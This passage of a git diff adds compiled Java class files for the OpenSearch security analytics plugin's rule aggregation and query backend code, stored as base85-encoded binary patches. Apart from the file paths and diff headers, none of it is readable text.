zsnzjCd`X~ZYKEh9ro^^fdOz+(LYcc?PEYmF#Tc16?r#;hxe%yWNJn}(yo|4^q%w*A4u@GwV?mbEo?rzOUgm@`s5X z&MeEh&JD>Zhj~px^9n6?y>%Twzz+p>uWlX*{HwJ}V$Mi-)Q$fq>cwnVWfcI8$g)6a*X~5?$O-z*6H|WO>#2&){9C(~&#q`7#u|h^SMU z687roZR~vmkKM)o%cFyj-o}B^!NcM8abE9Wc;+U@<9J4lca!qyc=i^?^4Y)O!vgv2 zJ2H;_IWw z-o-5NHmw}PBr3FPgp*eC-W39Kg1!I;Y4IU?Sik@d6Q(2FaSsvWA)XAAa|F*~l>A3= zg9s}S&qqGSNYGo%Q@R50Rb0XX^&OywkK+YiCkb%$bOSx{(-=K)kcz)i;Wsg}6*N8a@3RDn@aGp;X%5@%_v%D91%TUZ~xiXmw=Y8%! z|MT8o0UX003~UoP9fS*3(3E~8?a*1YBI&e3H(s%Q+gpiUC$d5r#f!Gz@MLIB^ZTsr zxeYs((=AU%C!N?0d;>XwJsC-g&pKsCQZYS~2oUJ=f(3!$nj*HFwzDWLt}M9zf_fgk zV%7L2!-~N6amRCgH=ZEV$mpyztLFN0vb8iX!x?+tlLAAvz_GnqJ9O21x>y+3 z;EU+Py(aF)b}A4rx{<(HecbV>KLjKIjInAUUAD*FTuSaVIU z#i)y{xpu_Qb%eY!mDRRf5yLp3TzF96_#L0q?T^vf9kB4Yfx`kjbqubW+{DLmL||KR zS)kk*pi}c#q!Tkj*VEHQJDZ_w+99(`8%5xi+d`{kZNvnVer);7D{GP;RsEjkLq~vW z|7KFTtUOp{Veq9_4g9FJq_ehoX4#QVRTLrvPYT?nfxCfqZfbR>h%t;Cpb`(=#?>Z{ zgZV$;1b$4U7wj;Sp@7AZ%y2qED6Qp`&U&7R))*@NIDu0JP6|BU16z3}xGH@URh$+u z>oX^(XXd6(J$t6ga68h=`H7&)4xGg^2A&q!-vbI0=kP2u(wEDz1|;xAZ|bMV7g58c zf%5`~dpQ0%R)xsK6fV%0>=G;qXO^3cN!duzyww$VTlpdd^C8UF3rl5mwuouW7^n-3 zXVh&c{93*zMbTQ<+0wi+@f_HD@=Ude#c-)7WxF$}r?Yj$Ja6KnY94vV3nI3^OZdEj z&$Savcd?npFnCF|9ur@{9Mi>aH0rG;3q%yjhQNKD6=ju}HX7m}V4IkS!-ilxDsctg z?pAT*GLdyiZ@P75a1TYs2-`(386>i$N|mP6e=IVEq|6CCmPNct{o}yF0|X|r^u1|F zG0RR<;9yqFR{24^1NGQ;uAaA>dXg~Ucel`ufpcc^?4|jJU1o=Q?f>J(tZv$i%Km9< zV3ZkP$xix!4%gK_(2p3`47507e5e#nhEEeOVVSC*n`DWete#<$&Vsr#za`>0vwX3; zPiVE$GNH7a3EC}2O-$04VG%3%vYHaUqFZ=Ip$*JZ#1dXM@ily%lbl@U+#R#Pw7T4u zo|>SWS!v3yHolIc9rsxq=%8Ci*+xzm5rLDm^7d@LQA)L4Dp0HkthVGs??tPW(V>8BCj4lG!dXl!Z!z1c$w!obcOovA~|Kf#rm)b@b%^} z@NC4KZXa1=^;(~u!cQ> zoE97v6tvw)NQrBSr)@1?VVC%O9+?&st` zj0zdXwI&m!CB{?}^{oM^t+9y9SfI>d?Bc3RSufCI$v1Udx`M0Z^~ha8;R7CP7!U@= z3|3VGm-OFRwQ}j-7~t%GX<*<3ip#B18JrI>SX7DCVZ0Z$ODIxD+U|YV5$%5;D;E#k z#FuX1tJ&~Kv`E5ZH@<;aD5?+NB&u!r7GC93?Y+UZAK*v$F@D08eYD3<@iY8_VRV95 bf?uBQ$FE57n}V|6Z}B!Elxe5mpD6tokqJpn literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/aggregation/AggregationItem.class b/bin/main/org/opensearch/securityanalytics/rules/aggregation/AggregationItem.class new file mode 100644 index 0000000000000000000000000000000000000000..69ace1d30d87492a359a8e44695895431052829e GIT binary patch literal 1803 zcmbu8T~8B16o$_fN+~Q9vEaAJhu9Wm1r!tviIiY4ja-1eAC_@DWV_qU&YIw_(nMq8 zg+IU_WjtrQb;~lnvdQl3%)IZJXU;kO{paT|0N94z0^}I%2g;QcEYaRpg1#=B}%R%e4%A`%U_Nq(!>`!wjY__$O|A+;{EcvkT$q0*o*y$Ez~1 zPlS@(lb`vSCr}*5)22`%#`|z|z<|ADFi{WuP;*~5xfh8%Qqqqx7{}8OBj2IZ8B90Q zvre>=tBISrfNo`urH2NC#9n7P92%kI@;4VI+ z_+7+4&A}KxnC|!+(-x1Ilz7DJ#v?MvBOZ?91bVTN@I8w&8%Ks?zV-udeT`*z@I4YQ z7V$8^@UZ~y!F`-DcmNOaP3Ap3JV)x<%6FJc-2?^b&7+4R%yv~t1d2|`bnrYZB(YME zZ!q@-O*u$G9vVRw%^*uzkOc%;8~{Q&Bamey$Wj($*$DE)3{uI0)DUE400$O3$kYfd121TRu*I*LFxlQ=zl{XFO3=5%7PpkL0-izz4I5L^CXb~ literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/aggregation/AggregationTraverseVisitor.class b/bin/main/org/opensearch/securityanalytics/rules/aggregation/AggregationTraverseVisitor.class new file mode 100644 index 0000000000000000000000000000000000000000..f26dbb493c943279b4054fccfe30edc0c60da6c7 GIT binary patch literal 6001 zcmc&&`EwIx7=Aul8k;U{k+xvvsFtG*M^HJGBH9z9J&?vCpyGD>ku0RUad#72QNjD- zKkz?r#u=H>;4#Da6F>MzIX+*qISAVjhAmEJ@_yOu`##@$Jnwh>^Y5Q`036572sQ}J z*iI^LXQkyz-7(T}R~k9T^j39C&#Zc;;l`a@M!Io5m2zZC_e|T0k5nbcx|is-k89L@q7f&378=l z@Y*xi@B)qqXq;E2!UZmePgzc(0#J@x6vq@}j|(h@?{GbuqT)*$PADpNl8T(rRL(Ng zs;n4yQo}*KEO7ntmQ4W3u7*vowX;u3Z!R*3tFv@WgNbq3%6&q&yg~ol+Lor&E+h&StA{I zP1SlrV6Uq62Wv#}24*54N_VwLChQzHOd4h}$9d%SOis>Srpcg%q-Jd?sTEhFH#MBa zJQ+_4B-7jnrR~g;z&%Tm|9WXDdP~DA;BIl{F%?DC*~+rB6gDFQa!V@o)Ka0mITiSM zy&Nw?giMHwcsGJ~1Z2oP)el`wU@|B8W%Q<}e$Iz%&b47BpS)+{taf@e(v9Ftf!T1Ira(W#Rew0~ zIV!M)f7b6)xelpogZm%vYw|XMW&_HKPXksxfxh6j&eJWAd%QhkHL6=2jx>&WO~mhZ z{u<-Ig0eey8`0Qb(9YjR=Wpn`#b+C^nctm7{Z6!^i=S@VDcPV7wxEZx z0LTM`Jjl4lYaj&!M%_UTpuz{ zsj6|Ka!(aWsRY}K4@ZjjRQd9Sk_+9V%;7Mfs8ZhRho~*a78kv=VYb{#j0@-uu+d4gFuj4$vNV{?r1Ys#IJ Y-%xI&{Fc(B{El*r@_WjQls};TKUKt4E&u=k literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/backend/AggregationBuilders.class b/bin/main/org/opensearch/securityanalytics/rules/backend/AggregationBuilders.class new file mode 100644 index 0000000000000000000000000000000000000000..69d64d8b04289444c4281a7b053601a46c4f1f26 GIT binary patch literal 2568 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 QcdtwMKC|i%+;x}!3sr0j&Hw-a literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/backend/OSQueryBackend.class b/bin/main/org/opensearch/securityanalytics/rules/backend/OSQueryBackend.class new file mode 100644 index 0000000000000000000000000000000000000000..92f42590bd803587981f1d97e8583b11045c41ce GIT binary patch literal 20244 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 Nq#gqtXGm(=e*+f!uk!!^ literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/backend/QueryBackend.class b/bin/main/org/opensearch/securityanalytics/rules/backend/QueryBackend.class new file mode 100644 index 0000000000000000000000000000000000000000..c8fb75bdf7a584231ac9dc351ea53a9f5879048c GIT binary patch literal 13536 zcmeHN3wTx4mHt<9lat&WNI+fzgz%6@c%&^VnqVXZ5F{j!AV|c=N$w$Ba&vFI_XdfN zii+0atG-G@ZMABp52wW$2_Q3yt+ky#rc*oZbfz=yygH9sYp3t3Q~IxS&V3}gfnzfB zeKX%T;rqCI@3Z&Xd$0Ac$6kAX_4hBl2w=H<+CZM5CKm6gignx3gl)y!cU2|q_MUh+ z*=t3uNN+OSo~VlVMC?RWo7LWFM?+Pcd+d1cDz{=FASl~y?XjvNR@pvqr5S(L2t+t50Hf%>i8?El{aI}N1 zg|_#(tihS5CmD`ZHG~t%8bNVOxFc#Md*Zg>xj~;-H0ZvpZmWHlUDY1z>WW1Z&LWpp zC40IfcGV^;9CthU*nG^{SfYv(c3I8jM~y??$4Gl`yWO1(>+H^8XSX%A{6{wJ9Jtrg ztUZte>~X=smKAQ*;dM(gP7c)!ZBfc4*Q=BqR+5MBii#^kXMLqAc}LzUN`))J(QvX> zFloWSmDRNJZ{b$Kia{TIE;%(kP#+7~LFA*{!~{$glS#2l3C*!d=cC^4{5FfP+?ot4-{eh0C@?X}p%IFxGt zr6$IrR8ZOwj@peqU2S%Ji-J@zz9H6bMYdY;u-3iCKyp`@{Jz95ICAL}r8j9H?cVMb z{V^>`Djt{W%xB<2Vkol>wo~$+nkh&H4Ga7(WhlZIW=YsnxZs*JnhkKFD}36HoJt_L z?!R$$**Hr>SVdTC;vAF)u@b8c)Cn%~x#l4ZF;S1z0<*(TuC|jjTvTeoss#&2#NsrG zL`@KDvChC{T%!f zXu>8zQ8;PGtz;~&>YhD%z1Ln-f@W+n(84)06jEPJTmc${K-At#moOnkA3g+k{&eGk4r5iHH-UfST(m=a^ ziBT(ENmQj*PCj+%0&EjIm2MH~HitWQk?=0!$|qN>j*ht9VX2U->M~^|ZeX{6?&erv zUE^v4kx}h&3vE{rQFI%K(GU6Dllu5XRb8~VDQY+EG;uu$K_fz*Z?(9d4W5h1Mv`wO z97vl8NMetH9>KDAwYW9mxOO~tZ#Et3zZ=${OZ6w{Tc_bEY z4bu4CV&eU{l`$H{s{vUWe1a{$>E?ij%C*Kb3E5&WaGQUxkb`bhv!dk=6Z=)<#a-c0 zC}LCS2JRXalpCA2DB-(Jd{7A&#Z}K7y7!P1J|&-Hy-r-T=K3Bhk|4Dnd(GbNxSdE) z85LOfnYdr^QQ%Bx;6ud7$mbd~fm-i}OgxN77$jMtkYHji{I#lg`LKzD_=xMfwuHOv zopGy+(ZN8Q>;;rTbl{MQkK!@*PuR(<{sSiPy1O|0xQWN{1l<66q&Um6M1qg_M%o#S z8PVpGb*Z4LsU`cUGB;~U+8(wOj{ADj#8Y^h=4F?aXmmUkBhJ2ZgpZy7z1F855tyvx2OjFtzw1bk8|XlFgG7x>Y_(rv zXTllPRXNs6c@GsFrEF87YyD1?Gw|h_=MIX+az?L$&-&r2??dcxEcCmXGjXk!vD{07 zI-fc^m@lqv)04iszL!mWL3MIWIFUx2dWKHCV&Y49l>sYbrL0fHkr(m#IFaXILsK(d zuHY*s{v2PWbV7D}IAn8z0X|dH78wISa?ebYEcm*KZ{RO@n&ooNI18f+pG+O-|A&HC zr~OM4-@^(d<{J7-qviH1Q9EH|#_po%kmc|BQbbv|)Z5?S@Ih z+3>%b_&5A}jtw`)7@>}8!#c$<8~(A0*LA~_!--*np-#ME;-`31FomMd*-3EasAN8T zEaq_LKTZ4`zYt6v3m{jOy3dRmqgsh}hk>q)#A{?zq+ocL8I;lv;ZJs|*OF$1(3}`dqhn`?Y z7k)TrAi*);jLEjoqjB15dHni>G($3B6P;ac%|be%q!gPHRQws?gp+yDHq(?b+Ey4& zXqH3IG1qB(nJMEmO_5JD2GJ(xm@+}LO_~m&loC8&$s|)I>)4`jVxx0(Go*Y-rnQCR zWeUo5z;sj2Riect;*JR7fXpgIvdU17@Bvuv?G9Euxq<%qUe zAM0WiG$1D_(rU_8I_J#cx7gH8SsQZoh{V^}6LG|Mttr=?WpCQmkT(BM5VBB0Mp{uf z&ngl!#n!nN48JGGRAddxmkv{QN!Se#>LXSn!N@mdE}RI|X{-rKrx43L8wmGuFc{6+1OBu82~Hmj>~o1awsonDQZ=a$=5EHB;9` 